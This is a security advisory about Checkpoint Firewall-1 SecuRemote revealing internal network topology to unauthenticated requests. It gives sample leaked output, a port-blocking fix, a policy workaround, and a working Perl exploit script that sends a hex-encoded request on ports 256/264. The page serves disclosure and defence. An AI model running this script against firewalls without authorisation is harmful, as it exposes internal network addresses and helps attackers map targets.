|
Brought to you by:
Suppliers of:
|
|
|
| |
| Checkpoint Firewall-1 makes use of a piece of software called SecuRemote (a.k.a. SecureRemote) to create encrypted sessions between users and FW-1 modules. Before remote users are able to communicate with internal hosts, a network topology of the protected network is downloaded to the client. While newer versions of the FW-1 software have the ability to restrict these downloads to only authenticated sessions, the default setting allows unauthenticated requests to be honored. This gives a potential attacker a wealth of information including IP addresses, network masks, and even friendly descriptions. |
| |
Credit:
The information has been provided by Haroon Meer. The workaround was supplied by Christian Herb.
|
| |
The following script will connect to the firewall, and download the topology (if SecuRemote is running). It is a tiny perl file, which needs only socket, to avoid the hassle of having to install the SecuRemote client <or booting windows> to test a firewall-1.
Example:
SensePost# perl sr.pl firewall.example.com
Testing on port 256
:val (
:reply (
: (-SensePost-dotcom-.hal9000-19.3.167.186
:type (gateway)
:is_fwz (true)
:is_isakmp (true)
:certificates ()
:uencapport (2746)
:fwver (4.1)
:ipaddr (19.3.167.186)
:ipmask (255.255.255.255)
:resolve_multiple_interfaces ()
:ifaddrs (
: (16.3.167.186)
: (12.20.240.1)
: (16.3.170.1)
: (29.203.37.97)
)
:firewall (installed)
:location (external)
:keyloc (remote)
:userc_crypt_ver (1)
:keymanager (
:type (refobj)
:refname ("#_-SensePost-dotcom-")
) :name
(-SensePost-dotcom-Neo16.3.167.189)
:type (gateway)
:ipaddr (172.29.0.1)
:ipmask (255.255.255.255)
)
--snip--
Solution:
Either block the SecuRemote's (TCP 256 and 264) ports to untrusted networks, or upgrade to the latest version of Checkpoint's Firewall-1.
Workaround:
You could restrict the topology download, so that only authenticated users can download it. Just go to Policy Properties Desktop Security of your Policy Editor and uncheck "respond to unauthenticated topology requests". After installing the Policy only authenticated Users could download the Topology.
The only reason you have to check this is when your clients wants to use FWZ encryption.
Exploit code:
#!/usr/bin/perl
# A Command-line tool that can be used to download network Topology
# from Firewall-1's running SecureRemote, with the option "Allow un
# authenticated cleartext topology downloads".
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon@sensepost.com - http://www.sensepost.com
use Socket;
if ($#ARGV<0) {die "Usage: sr.pl IP\n";}
$port=256;
$target=inet_aton($ARGV[0]);
print "Testing $host on port $port\n";
$SENDY= "410000000259052100000004c41e43520000004e28746f706f6c6f67792d7265717565737\
40a093a63616e616d6520282d53656e7365506f73742d646f74636f6d2d290a093a636861\
6c6c656e67652028633265323331383339643066290a290a00";
$SENDY = pack("H*",$SENDY);
@results=sendraw($SENDY);
if ($#results == 0) {
print "No results on port 256 - trying 264\n";
$port=264;
@results2=sendraw($SENDY);
if ($#results2 == 0) {die "Sorry - no results\n";}
} else {print @results;}
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { return ""; }
}
# Spidermark: sensepostdata fw1
|
|
|
|
|
